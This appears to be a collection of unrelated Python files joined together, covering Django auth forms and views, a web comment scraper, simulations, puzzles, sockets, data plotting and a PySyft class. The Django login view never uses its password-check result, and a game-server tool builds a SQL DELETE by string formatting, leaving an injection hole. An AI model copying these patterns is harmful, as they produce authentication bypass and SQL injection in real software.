"python " + CODE_PATH + "/train.py --input_file_pattern=" + DATA_DIR + "/train-?????-of-00256 --inception_checkpoint_file=" + INCEPTION_CHECKPOINT + " --train_dir=" + MODEL_DIR + "/train --train_inception=false --number_of_steps=" + TRAIN_STEPS + " --vocab_file=" + VOCAB_FILE) |
import sys
from collections import defaultdict
pair_record = set()
sequence = defaultdict(int)
for line in sys.stdin:
vid1, vid2 = map(int, line.split())
sequence[vid1]+=1
sequence[vid2]+=1
try:
n = int(sys.argv[1])
for v in range(n):
k = sequence[v]
print('{} {}'.format(v, k))
except:
for v, k in sequence.items():
print('{} {}'.format(v, k))
|
from django import forms
from cloudinary.forms import CloudinaryJsFileField, CloudinaryUnsignedJsFileField
from cloudinary.forms import CloudinaryFileField
from django.contrib.auth.forms import UserCreationForm,UserChangeForm
from django.contrib.auth import (
authenticate,
get_user_model,
login,
logout,
)
from modules.customers.models import Customer
User = get_user_model()
class UserLoginForm(forms.Form):
username = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'type': 'text','name':'username', 'placeholder':'Email or Username', 'class' :'sizefull s-text7 p-l-18 p-r-18'}))
password = forms.CharField(max_length=100, widget=forms.PasswordInput(attrs={'type': 'Password','name':'password', 'placeholder':'Password', 'class' :'sizefull s-text7 p-l-18 p-r-18'}))
#username = forms.CharField()
#password = forms.CharField(widget=forms.PasswordInput)
def clean(self, *args, **kwargs):
username = self.cleaned_data.get("username")
password = self.cleaned_data.get("password")
# user_qs = User.objects.filter(username=username)
# if user_qs.count() == 1:
# user = user_qs.first()
if username and password:
user = authenticate(username=username, password=password)
if not user:
raise forms.ValidationError("This user does not exist")
if not user.check_password(password):
raise forms.ValidationError("Incorrect passsword")
if not user.is_active:
raise forms.ValidationError("This user is not longer active.")
return super(UserLoginForm, self).clean(*args, **kwargs)
class UserRegisterForm(forms.ModelForm):
email2 = forms.EmailField(label='Confirm Email', widget=forms.TextInput(attrs={'type':'email','placeholder':'Confirm Email ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}))
password2 = forms.CharField(label='Confirm Password',widget=forms.PasswordInput(attrs={'type':'password', 'placeholder':'Confirm Password ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}))
class Meta:
model = User
fields = [
'first_name',
'last_name',
'username',
'email',
'email2',
'password',
'password2',
]
widgets={
'username':forms.TextInput(attrs={'placeholder':'User Name', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'first_name':forms.TextInput(attrs={'placeholder':'First Name ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'last_name':forms.TextInput(attrs={'placeholder':'Last Name ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'email':forms.TextInput(attrs={'placeholder':'Email','type':'email', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'password':forms.TextInput(attrs={'placeholder':'Password ','type':'password', 'class' :'sizefull s-text7 p-l-18 p-r-18'})
}
def clean_email2(self):
email = self.cleaned_data.get('email')
email2 = self.cleaned_data.get('email2')
if email != email2:
raise forms.ValidationError("Emails must match")
email_qs = User.objects.filter(email=email)
if email_qs.exists():
raise forms.ValidationError("This email has already been registered")
return email
def clean_password2(self):
password = self.cleaned_data.get('password')
password2 = self.cleaned_data.get('password2')
if password != password2:
raise forms.ValidationError("password must match")
return password
class CustomerRegisterForm(forms.ModelForm):
user = UserRegisterForm()
class Meta:
model = Customer
fields = [
'user_image',
'phone_number',
'date_of_birth',
'country',
'city',
'address',
]
widgets={
'phone_number':forms.TextInput(attrs={'placeholder':'Phone Number', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'date_of_birth':forms.TextInput(attrs={'placeholder':'Date of Birth','type':'date', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'country':forms.TextInput(attrs={'placeholder':'Country ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'city':forms.TextInput(attrs={'placeholder':'City', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'address':forms.TextInput(attrs={'placeholder':'Street Address ', 'class' :'sizefull s-text7 p-l-18 p-r-18'})
}
from string import Template
from django.utils.safestring import mark_safe
from django.conf import settings
class PictureWidget(forms.widgets.Widget):
def render(self, name, value, attrs=None, renderer=None):
html = Template("""<img src="$media$link"/>""")
return mark_safe(html.substitute(media=settings.MEDIA_URL, link=value))
class editProfileForm(forms.ModelForm):
# user_image = forms.ImageField( label=('User image'),required=False, error_messages = {'invalid':("Image files only")}, widget=forms.FileInput)
# image_tag = forms.ImageField(widget=mark_safe(Template("<img src=""/>")))
class Meta:
model=Customer
# user_image = CloudinaryFileField()
fields = [
'user_image',
'phone_number',
'date_of_birth',
'country',
'city',
'address',
]
widgets={
'phone_number':forms.TextInput(attrs={'placeholder':'Phone Number', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'date_of_birth':forms.DateInput(attrs={ 'placeholder':'Date of Birth','type':'date', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'country':forms.TextInput(attrs={'placeholder':'Country ', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'city':forms.TextInput(attrs={'placeholder':'City', 'class' :'sizefull s-text7 p-l-18 p-r-18'}),
'address':forms.TextInput(attrs={'placeholder':'Street Address ', 'class' :'sizefull s-text7 p-l-18 p-r-18'})
}
|
import cards as c
def run_sim(scores, times):
#---------------------------------------------------
# Data Dictionary
#---------------------------------------------------
# deck to hold the cards
deck = c.Deck()
# loop invariant
busted = False
# Player
player = c.Player()
# give the player his first to cards
deck.shuffle()
player.hit(deck.draw())
player.hit(deck.draw())
# main loop, hit until busted
while not busted:
(score1, score2) = player.calcHand()
if score1 != score2:
times[score1] = times[score1] + 1
if score2 <= 21:
times[score2] = times[score2] + 1
else:
times[score1] = times[score1] + 1
player.hit(deck.draw())
(newScore1, newScore2) = player.calcHand()
# special case of an ace
if newScore1 != newScore2:
# player busted
if newScore1 > 21:
scores[score1] = scores[score1] + 1
busted = True
if newScore2 > 21:
if score2 <= 21:
scores[score2] = scores[
score2] + 1
# normal case, no ace
else:
if newScore1 > 21:
scores[score1] = scores[score1] + 1
busted = True
#---------------------------------------------------
# Data Dictionary
#---------------------------------------------------
# Array to hold how many times the player busted by
# hitting... score[12] is when the player had
# 12 as a score, the value is how many times
# he busted, by hitting
scores = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0]
times = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0]
for i in xrange(0, 1000000):
if ( i % 100000) == 0:
print "."
run_sim(scores, times)
for i in range(0, len(scores)):
if (scores[i] != 0) and (i != 21):
print "%d %.3f %d/%d\n" % (
i, float(scores[i])/float(times[i]),
scores[i], times[i]) |
import argparse
import sys
import numpy as np
import pickle
from multiprocessing import Process, Queue, cpu_count
from puzzle_maker import build_new_puzzle, display_grid
from solve_puzzle import search, await_solution
from typing import Dict
def _solve(puzzle: np.ndarray, p: int) -> None:
q = Queue()
processes = [Process(target=search, args=(puzzle.copy(), q))
for _ in range(p)]
for p in processes:
p.start()
await_solution(puzzle, q)
for p in processes:
p.terminate()
p.join()
sys.exit(0)
def run(args: Dict):
# generate new puzzle, save, and exit
if args["new"]:
puzzle = build_new_puzzle(args["clues"])
with open("puzzle.pkl", "wb") as f:
pickle.dump(puzzle, f)
print("puzzle:\n")
display_grid(puzzle)
print("saving...")
print("done.")
sys.exit(0)
# generate new puzzle, save, and solve
if args["gen"]:
puzzle = build_new_puzzle(args["clues"])
with open("puzzle.pkl", "wb") as f:
pickle.dump(puzzle, f)
print("puzzle:\n")
display_grid(puzzle)
print("saving...")
# default: load saved puzzle, and solve
else:
try:
with open("puzzle.pkl", "rb") as f:
puzzle = pickle.load(f)
print("puzzle:\n")
display_grid(puzzle)
except FileNotFoundError:
print("No puzzle found. Run again with --gen flag to generate new puzzle.")
sys.exit(1)
# solve
cpus = min(cpu_count(), args["parallel"])
print("solving ({} cores)...".format(cpus))
_solve(puzzle, cpus)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Sudoku")
parser.add_argument("--new", "-n",
const=1,
nargs="?",
type=int,
help="-n to generate new puzzle and save it. Use '--clues' argument to specify number of clues.",
default=0)
parser.add_argument("--gen", "-g",
const=1,
nargs="?",
type=int,
help="1 to generate new puzzle (default 0: use saved puzzle, if available).",
default=0)
parser.add_argument("--clues", "-c",
type=int,
help="Number of clues in new puzzle (default 25).",
default=25)
parser.add_argument("--parallel", "-p",
type=int,
help="Number of cores to use (default 1).",
default=1)
args = {k: v for k, v in parser.parse_args().__dict__.items()}
run(args)
|
# encoding=utf-8
##############################################################################################
# @file:doubanComments.py
# @author:Liyanrui
# @date:2016/11/17
# @version:Ver0.0.0.100
# @note:豆瓣电影选“电影”获取评论的文件
###############################################################################################
import re
import urllib
import json
import math
from utility.timeutility import TimeUtility
from utility.common import Common
from storage.cmtstorage import CMTStorage
from storage.newsstorage import NewsStorage
from utility.timeutility import TimeUtility
from log.spiderlog import Logger
from website.common.comments import SiteComments
from utility.xpathutil import XPathUtility
from bs4 import BeautifulSoup
##############################################################################################
# @class:doubanComments
# @author:Liyanrui
# @date:2016/11/17
# @note:豆瓣电影选“电影”获取评论的类,继承于SiteComments类
##############################################################################################
class doubanComments(SiteComments):
COMMENTS_URL = 'https://movie.douban.com/subject/{articleId}/comments?start={start}&limit={pagesize}&sort=new_score&status=P'
PAGE_SIZE = 20
STEP_1 = None
STEP_2 = 2
STEP_3 = 3
Flg = True
##############################################################################################
# @functions:__init__
# @param: none
# @return:none
# @author:Liyanrui
# @date:2016/11/17
# @note:豆瓣电影选“电影”类的构造器,初始化内部变量
##############################################################################################
def __init__(self):
SiteComments.__init__(self)
##############################################################################################
# @functions:process
# @param:共通模块传入的参数(对象url, 原始url, 当前step数,自定义参数)
# @return:Step1:获取评论的首页url
# Step2:获取评论的所有url
# Step3: 抽出的评论和最新评论的创建时间
# @author:Liyanrui
# @date:2016/11/17
# @note:Step1:通过共通模块传入的html内容获取到articleId,拼出获取评论总数的url,并传递给共通模块
# Step2:通过共通模块传入的html内容获取到评论总数,拼出获取评论的url,并传递给共通模块
# Step3:通过共通模块传入的html内容获取到评论和最新评论的创建时间,并传递给共通模块
##############################################################################################
def process(self, params):
try:
if params.step is self.STEP_1:
self.step1(params)
elif params.step == self.STEP_2:
self.step2(params)
except:
Logger.printexception()
#----------------------------------------------------------------------
def step1(self, params):
# 取得url中的id
articleId = self.r.parse(r'^https://movie\.douban\.com/\w+/(\d+)', params.url)[0]
# 取得评论件数
xpathobj = XPathUtility(params.content)
text = xpathobj.getstring(xpath='//*[@id="comments-section"]//h2/*[@class="pl"]/a')
numtext = self.r.parse('\d+', text)
if not numtext:
return
curcmtnum = float(numtext[0])
NewsStorage.setcmtnum(params.originalurl, curcmtnum)
dbcmtnum = CMTStorage.getcount(params.originalurl, True)
if dbcmtnum >= curcmtnum:
return
# 循环取得评论的url
pages = int(math.ceil(float(curcmtnum - dbcmtnum) / self.PAGE_SIZE))
if pages >= self.maxpages:
pages = self.maxpages
for page in range(1, pages + 1, 1):
url = doubanComments.COMMENTS_URL.format(articleId=articleId, start=(page-1) * self.PAGE_SIZE, pagesize=self.PAGE_SIZE)
self.storeurl(url, params.originalurl, doubanComments.STEP_2)
#----------------------------------------------------------------------
def step2(self, params):
# 取得评论
soup = BeautifulSoup(params.content, 'html5lib')
comments = soup.select('#comments > .comment-item')
for comment in comments:
try:
curtime = comment.select_one('.comment-time').get('title')
content = comment.select_one('.comment > p').get_text()
CMTStorage.storecmt(params.originalurl, content, curtime, '')
except:
Logger.printexception() |
#Guess the number game
import random
secretNumber = random.randint(1,100)
print("I am thinking of a number between 1 and 100.")
#Ask for a guess
x = range(1,7,1)
for guessTally in x:
print("Make a guess:")
guess = int(input())
if guess < secretNumber:
print("Too Low!")
elif guess > secretNumber:
print("Too High!")
else:
break
#Indentations matter, make sure to indent blocks properly or things will not work!
if guess == secretNumber:
print("Correct! You guessed correctly in " + str(guessTally) + " guesses.")
else:
print("Wrong! The number was " + str(secretNumber))
|
from django.contrib.auth import authenticate, login as django_login
from django.shortcuts import render, redirect
# Create your views here.
from django.contrib.auth.hashers import make_password, check_password
from django.http import JsonResponse
from django.urls import reverse
from .models import UserToken, Info
from django.views.generic import View
from captcha.models import CaptchaStore
from captcha.helpers import captcha_image_url
from django.http import HttpResponse
import json
import time
def login(request):
if request.method == 'GET':
return render(request, 'login/login.html')
usr = request.POST.get('username')
pas = request.POST.get('password')
make_password(pas)
obj = Info.objects.filter(username=usr).first()
if not obj:
return render(request, 'error.html', {
'msg': '用户不存在'
})
check_pas = Info.objects.filter(username=usr).values('password')[0]['password']
cp = check_password(pas, check_pas)
if not check_pas:
return render(request, 'error.html', {
'msg': '账号密码不匹配'
})
token = str(time.time()) + usr
UserToken.objects.update_or_create(username=obj, defaults={'token': token})
capt = request.POST.get("yzm") # 用户提交的验证码
key = request.POST.get("hash") # 验证码答案
if not jarge_captcha(capt, key):
return render(request, 'login/login.html', {
'code': 0,
'msg': '验证码不正确'
})
return redirect(reverse('blog:index'))
def register(request):
if request.method == 'GET':
return render(request, 'login/register.html')
user = request.POST.get('username')
print(user)
pwd = request.POST.get('password')
passpwd = make_password(pwd)
tel = request.POST.get('telphone')
capt = request.POST.get("yzm") # 用户提交的验证码
key = request.POST.get("hash") # 验证码答案
if not jarge_captcha(capt, key):
return render(request, 'login/register.html', {
'code': 0,
'msg': '验证码不正确'
})
obj = Info.objects.filter(username=user).first()
if not obj:
user = Info.objects.create(username=user, password=passpwd, telphone=tel)
if not user:
return render(request, 'error.html', {'msg': '创建用户失败'})
return render(request, 'login/login.html', {'code': 1, 'msg': '注册成功'})
else:
return render(request, 'login/login.html', {'code': 2, 'msg': '用户已存在,注册失败'})
# 创建验证码
def captcha():
ret = {}
hashkey = CaptchaStore.generate_key() # 验证码答案
ret['hashkey'] = hashkey
image_url = captcha_image_url(hashkey) # 验证码地址
ret['image_url'] = image_url
# captcha = {'hashkey': hashkey, 'image_url': image_url}
return JsonResponse(ret)
# 刷新验证码
def refresh_captcha(request):
return HttpResponse(json.dumps(captcha()), content_type='application/json')
# 验证验证码
def jarge_captcha(captchaStr, captchaHashkey):
if captchaStr and captchaHashkey:
try:
# 获取根据hashkey获取数据库中的response值
get_captcha = CaptchaStore.objects.get(hashkey=captchaHashkey)
if get_captcha.response == captchaStr.lower(): # 如果验证码匹配
return True
except:
return False
else:
return False
class IndexView(View):
def get(self, request):
ret = {}
hashkey = CaptchaStore.generate_key() # 验证码答案
ret['hashkey'] = hashkey
image_url = captcha_image_url(hashkey) # 验证码地址
ret['image_url'] = image_url
return JsonResponse(ret)
|
try:
from PIL import Image
except ImportError:
import Image
import pytesseract
print (pytesseract.image_to_string(Image.open("solved.jpg")))
output = ''
for i in range(1, 577):
name = "%s.jpg" % i
c = pytesseract.image_to_string(Image.open(name))
print ("%s - %s" % (name, c))
output += c
print (output)
|
class Solution:
def findLengthOfShortestSubarray(self, arr: List[int]) -> int:
if len(arr) == 0:
return 0
left_end, right_end = 0, len(arr)-1
while left_end < len(arr)-1:
if left_end+1 < len(arr) and arr[left_end+1] < arr[left_end]:
break
left_end += 1
while right_end > 0:
if right_end-1 > -1 and arr[right_end-1] > arr[right_end]:
break
right_end -= 1
merge = float('-inf')
left, right = 0, max(right_end, left_end+1)
while left <= left_end and right < len(arr):
if arr[left] > arr[right]:
right += 1
else:
merge = max(merge, left + 1 + len(arr) - right)
left += 1
return len(arr) - max(left_end+1, len(arr)-right_end, merge)
|
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import pandas as pd
df_visual_data = pd.read_csv('visualize_I258_2015_inaccuracy.csv')
df_visual_data_2018 = pd.read_csv('visualize_radius_group_indices_frame_2018.csv')
sign_to_plot = int(input("Please enter the sign you want to plot"))
df_visual_data = df_visual_data.groupby('sign_id')
df_visual_data_2018 = df_visual_data_2018.groupby('sign_id')
print(len(df_visual_data),'2015')
print(len(df_visual_data_2018),'2018')
df_visual_data = df_visual_data.get_group(sign_to_plot)
df_visual_data_2018 = df_visual_data_2018.get_group(sign_to_plot)
print(len(df_visual_data),'2015')
print(len(df_visual_data_2018),'2018')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
fig_1 = plt.figure()
ax_1 = fig_1.add_subplot(111, projection='3d')
x_1=[]
y_1=[]
z_1=[]
for row in df_visual_data_2018.iterrows():
index=row[0]
value=row[1]
x_1.append(value['lidar_lat'])
y_1.append(value['lidar_long'])
z_1.append(value['lidar_alt'])
#print(len(x))
x=[]
y=[]
z=[]
for row in df_visual_data.iterrows():
index=row[0]
value=row[1]
x.append(value['lidar_lat'])
y.append(value['lidar_long'])
z.append(value['lidar_alt'])
# x_sign=df_visual_data['lat_sign']
# y_sign=df_visual_data['long_sign']
# z_sign=df_visual_data['alt_sign']
# x_car=df_visual_data['car_lat']
# y_car=df_visual_data['car_long']
# z_car=df_visual_data['car_alt']
ax.scatter(x, y, z,s=3, c='r', marker='o')
# ax.scatter(x_sign, y_sign, z_sign, c='g', marker='^')
# ax.scatter(x_car,y_car,z_car,c='y',marker='*')
ax_1.scatter(x_1, y_1, z_1,s=3, c='g', marker='o')
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
ax.set_title('2015')
ax_1.set_xlabel('X Label')
ax_1.set_ylabel('Y Label')
ax_1.set_zlabel('Z Label')
ax_1.set_title('2018')
plt.show()
|
# 3. A client sends to the server a string. The server returns the reversed string to the client (characters from the end to begging)
import socket, struct
def read_string(source):
c = ''
s = ''
while( c != '\n'):
c = source.recv(1)
s+=c
return s[:-1]
def solve_client(client):
string = read_string(client)
client.sendall(string[::-1] + '\n')
if __name__ == "__main__":
print(socket.gethostname())
try:
rs=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
rs.bind( ('0.0.0.0',8090) )
rs.listen(5)
except socket.error as msg:
print(msg.strerror)
exit(-1)
while True:
print('Waiting clients..')
client_socket, addrc = rs.accept()
print('Client ' + str(addrc) + ' has connected.')
solve_client(client_socket)
|
'''
- Methods (functions):
def function(**kwargs, *args):
-actions-
-checkers-
-loggers-
-returns-
-exceptions-
''' |
from django import forms
from django.contrib.contenttypes.models import ContentType
from django.db.models import Q, Count
from django_serializer.base_views import (ListView, DetailsView,
CreateView, DeleteView, BaseView)
from django_serializer.exceptions import ServerError
from django_serializer.mixins import ObjectMixin, SerializerMixin
from django_serializer.permissions import PermissionsModelMixin, PermissionsMixin
from vkrb.core.mixins import EventMixin, LimitOffsetFullPaginator
from vkrb.core.utils import get_absolute_bundle_urls, render_to_pdf
from vkrb.favorites.forms import FavoriteForm
from vkrb.favorites.models import FavoriteItem
from vkrb.recourse.forms import RecourseForm, LikeRecourseForm
from vkrb.recourse.models import Recourse, Specialty, RecourseLike
from vkrb.recourse.serializers import (RecourseSerializer,
SpecialtySerializer,
RecourseLikeSerializer)
class RecourseListView(EventMixin, ListView):
class RecourseForm(forms.Form):
my = forms.BooleanField(required=False)
specialty = forms.ModelChoiceField(Specialty.objects.all(), required=False)
def get_queryset(self):
queryset = super().get_queryset()
q = Q(parent__isnull=True)
my = self.request_args.get('my')
specialty = self.request_args.get('specialty')
if my:
q &= Q(user=self.request.user)
if specialty:
q &= Q(specialty=specialty)
return queryset.filter(q).order_by('-created')
def get_serializer_kwargs(self, obj, **kwargs):
serializer_kwargs = super().get_serializer_kwargs(obj, **kwargs)
serializer_kwargs['request_user'] = self.request.user
return serializer_kwargs
section = 'recourse'
args_form = RecourseForm
authorized_permission = (PermissionsModelMixin.Permission.R,)
paginator = LimitOffsetFullPaginator
model = Recourse
serializer = RecourseSerializer
class RecourseGetView(DetailsView):
authorized_permission = (PermissionsModelMixin.Permission.R,)
model = Recourse
serializer = RecourseSerializer
def get_serializer_kwargs(self, obj, **kwargs):
serializer_kwargs = super().get_serializer_kwargs(obj, **kwargs)
serializer_kwargs['request_user'] = self.request.user
return serializer_kwargs
class RecourseCreateView(CreateView):
authorized_permission = (PermissionsModelMixin.Permission.R,
PermissionsModelMixin.Permission.W)
serializer = RecourseSerializer
form_class = RecourseForm
def get_serializer_kwargs(self, obj, **kwargs):
serializer_kwargs = super().get_serializer_kwargs(obj, **kwargs)
serializer_kwargs['request_user'] = self.request.user
return serializer_kwargs
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
class SpecialtyListView(ListView):
model = Specialty
serializer = SpecialtySerializer
paginator = LimitOffsetFullPaginator
def get_queryset(self):
q = super().get_queryset()
return q.order_by('order')
class LikeCreateView(CreateView):
authorized_permission = (PermissionsModelMixin.Permission.R,
PermissionsModelMixin.Permission.W)
serializer = RecourseLikeSerializer
form_class = LikeRecourseForm
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
class LikeDeleteView(DeleteView):
class LikeForm(forms.Form):
recourse = forms.ModelChoiceField(Recourse.objects.all())
model = RecourseLike
def get_args_form(self):
return self.LikeForm
def get_object(self):
try:
return self.model.objects.get(user=self.request.user,
recourse=self.request_args['recourse'])
except self.model.DoesNotExist:
raise ServerError(ServerError.NOT_FOUND)
class CreatePDFView(ObjectMixin, PermissionsMixin, BaseView):
model = Recourse
authorized_permission = (PermissionsModelMixin.Permission.R,)
def response_wrapper(self, response):
return response
def get(self, request, *args, **kwargs):
self.check_r_permission(self.request.user)
recourse = self.get_object()
children = Recourse.objects.filter(parent=recourse) \
.annotate(num_likes=Count('recourselike')).order_by('-num_likes')[:5]
ctx = {
'recourse': recourse,
'children': children,
'css_urls': get_absolute_bundle_urls('pdf', 'css'),
}
return render_to_pdf(template_path='recourse.html', ctx=ctx)
class FavoriteRecourseCreateView(CreateView):
authorized_permission = (PermissionsModelMixin.Permission.R,
PermissionsModelMixin.Permission.W)
serializer = RecourseSerializer
form_class = FavoriteForm
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['user'] = self.request.user
kwargs['content_type'] = 'recourse'
return kwargs
def get_serializer_kwargs(self, obj, **kwargs):
serializer_kwargs = super().get_serializer_kwargs(obj, **kwargs)
serializer_kwargs['request_user'] = self.request.user
return serializer_kwargs
def post(self, request, *args, **kwargs):
inst = super().post(request, *args, **kwargs)
return inst.content_object
class FavoriteRecourseDeleteView(SerializerMixin, DeleteView):
authorized_permission = (PermissionsModelMixin.Permission.R,
PermissionsModelMixin.Permission.D)
model = FavoriteItem
serializer = RecourseSerializer
class FavoriteForm(forms.Form):
object_id = forms.IntegerField()
def get_args_form(self):
return self.FavoriteForm
def get_object(self):
content_type = ContentType.objects.get(model='recourse')
try:
return self.model.objects.get(user=self.request.user,
content_type=content_type,
object_id=self.request_args['object_id'])
except self.model.DoesNotExist:
raise ServerError(ServerError.NOT_FOUND)
def get_serializer_kwargs(self, obj, **kwargs):
serializer_kwargs = super().get_serializer_kwargs(obj, **kwargs)
serializer_kwargs['request_user'] = self.request.user
return serializer_kwargs
def post(self, request, *args, **kwargs):
super().post(request, *args, **kwargs)
try:
return Recourse.objects.get(id=self.request_args['object_id'])
except Recourse.DoesNotExist:
raise ServerError(ServerError.NOT_FOUND)
|
x=[]
max=0
for i in range(9):
x.append(int(input()))
if x[i]>=max:
max = x[i]
count = i+1
print(max)
print(count)
# print((x.index(max))+1) ##list에서 index 사용 |
from mpi4py import MPI
rank = MPI.COMM_WORLD.Get_rank()
size = MPI.COMM_WORLD.Get_size()
name = MPI.Get_processor_name()
msg = ("Hello, World! "
"I am process %d of %d on %s\n" %
(rank, size, name))
import sys
sys.stdout.write(msg)
|
MODULE_NAME = 'close-session'
MODULE_DESC = "Remove an account's session"
MODULE_VER = '1.0'
def START(db, *args):
"""Remove Darkstar account sessions"""
import argparse
AP = argparse.ArgumentParser('ffxi-tools ' + MODULE_NAME,
description='Removes a session')
AP.add_argument('login', metavar='login_name',
help='The login for the account')
args = AP.parse_args(args=args)
sessions = db.get('''
select acc.login, c.charname
from accounts_sessions sess
left join accounts acc on sess.accid = acc.id
left join chars c on sess.charid = c.charid
'''.strip(), ('login', 'character'))
if sessions and args.login in str(sessions):
print 'Removing session for', args.login, '...',
db.run('''
delete from accounts_sessions
where accid = (select id from accounts where login = '%s')
'''.strip() % (args.login,))
print 'Removed'
else:
print 'No session found for account', args.login
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
# loading image
img0 = cv2.imread('gaussian 1.png')
# converting to gray scale
gray = cv2.cvtColor(img0, cv2.COLOR_BGR2GRAY)
# remove noise
#img = cv2.GaussianBlur(gray,(3,3),0)
sobelx = cv2.Sobel(img0,cv2.CV_64F,1,0,ksize=3) # x
sobely = cv2.Sobel(img0,cv2.CV_64F,0,1,ksize=3) # y
plt.subplot(2,2,1),plt.imshow(img0,cmap = 'gray')
plt.title('Original'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,2),plt.imshow(sobelx,cmap = 'gray')
plt.title('Sobel horizontal'), plt.xticks([]), plt.yticks([])
plt.subplot(2,2,3),plt.imshow(sobely,cmap = 'gray')
plt.title('Sobel vertical'), plt.xticks([]), plt.yticks([])
plt.show()
|
class Node(object):
def __init__(self, value):
self.value = value
self.right = None
self.left = None
class BinaryTree(object):
def __init__(self, root):
self.root = root
def preorder_search(self, start, value):
if start:
if start.value == value:
return True
if self.preorder_search(start.left, value):
return True
if self.preorder_search(start.right, value):
return True
return False
def search(self, value):
if self.root:
if self.root.value == value:
return True
if self.preorder_search(self.root.left, value):
return True
if self.preorder_search(self.root.right, value):
return True
return False
def preorder_print(self, start):
a = []
if start:
a.append(start.value)
if start.left:
a += self.preorder_print(start.left)
if start.right:
a += self.preorder_print(start.right)
return a
def inorder_print(self, start):
a = []
if start:
if start.left:
a += self.inorder_print(start.left)
a.append(start.value)
if start.right:
a += self.inorder_print(start.right)
return a
def postorder_print(self, start):
a = []
if start:
if start.left:
a += self.postorder_print(start.left)
if start.right:
a += self.postorder_print(start.right)
a.append(start.value)
return a
tree = BinaryTree(Node(1))
tree.root.left = Node(2)
tree.root.right = Node(3)
tree.root.left.left = Node(4)
tree.root.left.right = Node(5)
tree.root.right.left = Node(6)
tree.root.right.right = Node(7)
if __name__ == "__main__":
# Test search
# Should be True
print (tree.search(4))
# Should be False
print (tree.search(9))
print (tree.preorder_print(tree.root))
print (tree.postorder_print(tree.root))
|
from typing import List
from typing import Tuple
from typing import Union
from typing import Dict
import torch
import syft as sy
from syft.workers.abstract import AbstractWorker
class State(object):
"""The State is a Plan attribute and is used to send tensors along functions.
It references Plan tensor or parameters attributes using their name, and make
sure they are provided to remote workers who are sent the Plan.
"""
def __init__(self, owner, plan=None, state_ids=None):
self.owner = owner
self.plan = plan
self.state_ids = state_ids or []
def __str__(self):
"""Returns the string representation of the State."""
out = "<"
out += "State:"
for state_id in self.state_ids:
out += " {}".format(state_id)
out += ">"
return out
def __repr__(self):
return self.__str__()
def tensors(self) -> List:
"""
Fetch and return all the state elements.
Perform a check of consistency on the elements ids.
"""
tensors = []
for state_id in self.state_ids:
tensor = self.owner.get_obj(state_id)
assert tensor.id == state_id
tensors.append(tensor)
return tensors
def clone_state_dict(self) -> Dict:
"""
Return a clone of the state elements. Tensor ids are kept.
"""
return {tensor.id: tensor.clone() for tensor in self.tensors()}
def copy(self) -> "State":
state = State(owner=self.owner, state_ids=self.state_ids.copy())
return state
def read(self):
"""
Return state elements
"""
tensors = []
for state_id in self.state_ids:
tensor = self.owner.get_obj(state_id)
tensors.append(tensor)
return tensors
def set_(self, state_dict):
"""
Reset inplace the state by feeding it a dict of tensors or params
"""
assert list(self.state_ids) == list(state_dict.keys())
for state_id, new_tensor in state_dict.items():
tensor = self.owner.get_obj(state_id)
with torch.no_grad():
tensor.set_(new_tensor)
tensor.child = new_tensor.child if new_tensor.is_wrapper else None
tensor.is_wrapper = new_tensor.is_wrapper
if tensor.child is None:
delattr(tensor, "child")
@staticmethod
def create_grad_if_missing(tensor):
if isinstance(tensor, torch.nn.Parameter) and tensor.grad is None:
o = tensor.sum()
o.backward()
if tensor.grad is not None:
tensor.grad -= tensor.grad
def send_for_build(self, location, **kwargs):
"""
Send functionality that can only be used when sending the state for
building the plan.
"""
for tensor in self.tensors():
self.create_grad_if_missing(tensor)
tensor.send_(location, **kwargs)
def fix_precision_(self, *args, **kwargs):
for tensor in self.tensors():
self.create_grad_if_missing(tensor)
tensor.fix_precision_(*args, **kwargs)
def float_precision_(self):
for tensor in self.tensors():
tensor.float_precision_()
def share_(self, *args, **kwargs):
for tensor in self.tensors():
self.create_grad_if_missing(tensor)
tensor.share_(*args, **kwargs)
def get_(self):
"""
Get functionality that can only be used when getting back state
elements converted to additive shared tensors. Other than this,
you shouldn't need to the get the state separately.
"""
# TODO Make it only valid for AST
for tensor in self.tensors():
tensor.get_()
@staticmethod
def simplify(worker: AbstractWorker, state: "State") -> tuple:
"""
Simplify the plan's state when sending a plan
"""
return (
sy.serde.msgpack.serde._simplify(worker, state.state_ids),
sy.serde.msgpack.serde._simplify(worker, state.tensors()),
)
@staticmethod
def detail(worker: AbstractWorker, state_tuple: tuple) -> "State":
"""
Reconstruct the plan's state from the state elements and supposed
ids.
"""
state_ids, state_elements = state_tuple
state_ids = sy.serde.msgpack.serde._detail(worker, state_ids)
state_elements = sy.serde.msgpack.serde._detail(worker, state_elements)
for state_id, state_element in zip(state_ids, state_elements):
worker.register_obj(state_element, obj_id=state_id)
state = State(owner=worker, plan=None, state_ids=state_ids)
return state
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 3 11:57:11 2019
@author: emilyhoward
"""
import math
import numpy as np
quad = np.zeros ([0,2])
